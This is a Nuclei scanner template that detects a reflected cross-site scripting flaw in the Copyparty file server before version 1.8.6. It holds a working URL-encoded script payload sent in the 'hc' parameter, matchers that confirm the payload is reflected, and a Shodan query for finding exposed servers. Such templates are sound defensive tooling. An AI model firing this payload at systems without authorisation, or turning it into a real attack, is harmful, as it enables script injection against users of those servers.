id: copyparty-xss

info:
  name: Copyparty v1.8.6 - Cross-Site Scripting
  author: theamanrawat
  severity: medium
  description: |
    Copyparty is a portable file server. Versions prior to 1.8.6 are subject to a reflected cross-site scripting (XSS) Attack. The vulnerability in the application's web interface could allow an attacker to execute malicious javascript code by tricking users into accessing a malicious link.
  remediation: Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://github.com/9001/copyparty/security/advisories/GHSA-cw7j-v52w-fp5r
  metadata:
    verified: true
    max-request: 1
    shodan-query: title:"copyparty"
  tags: Copyparty

http:
  - method: GET
    path:
      - "{{BaseURL}}/?hc=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<a href="/"><script>alert(document.domain)</script>'
          - 'choose your OS'
        condition: and

      - type: word
        part: header
        words:
          - 'text/html'

      - type: status
        status:
          - 200

# digest: 4b0a00483046022100c55520a5de71a6a68063b179058f76f801387728cb165a2da08d43ab351103da022100e9cd96a1b10c41cef79c9d0124114e07ae8a4481a2091a187e517754aa5b94db:922c64590222798bb761d5b6d8e72950
